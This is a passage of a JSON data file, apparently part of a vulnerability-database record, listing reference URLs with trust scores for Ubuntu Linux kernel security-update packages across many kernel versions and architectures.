        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-22-powerpc64-smp_2.6.32-22.35_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-28-powerpc64-smp_2.6.24-28.70_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-source-2.6.31_2.6.31-307.15_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22-preempt_2.6.32-22.35_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-28-openvz_2.6.24-28.70_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-19-generic_2.6.28-19.61_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-kernel-devel_2.6.24-28.70_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-xeon_2.6.15-55.84_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-22-generic-di_2.6.31-22.60_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-28.70_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-28-rt_2.6.24-28.70_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-22-powerpc_2.6.31-22.60_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-28-rt_2.6.24-28.70_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-22.60_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-22-lpia_2.6.31-22.60_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.32-306.11.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22-generic_2.6.32-22.35_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-28-powerpc64-smp_2.6.24-28.70_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-server_2.6.15-55.84_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-tools-common_2.6.32-22.35_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-214.28.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-55.84_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-doc_2.6.31-307.15_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-28-powerpc-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-28-server_2.6.24-28.70_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-28-sparc64-di_2.6.24-28.70_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-server_2.6.15-55.84_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-server_2.6.32-22.35_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/vlan-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-22-generic_2.6.31-22.60_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-22-sparc64_2.6.32-22.35_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-22-386_2.6.31-22.60_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-608.14.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/vlan-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.32_2.6.32-22.35_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-sparc64-di_2.6.15-55.84_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.32-306-ec2_2.6.32-306.11_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-19.61_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-22-generic-di_2.6.31-22.60_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-28-rt_2.6.24-28.70_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-qcm-msm/linux-qcm-msm_2.6.31.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.24_2.6.24-28.70_all.deb"
      },
      {
        "trust": 0.1,
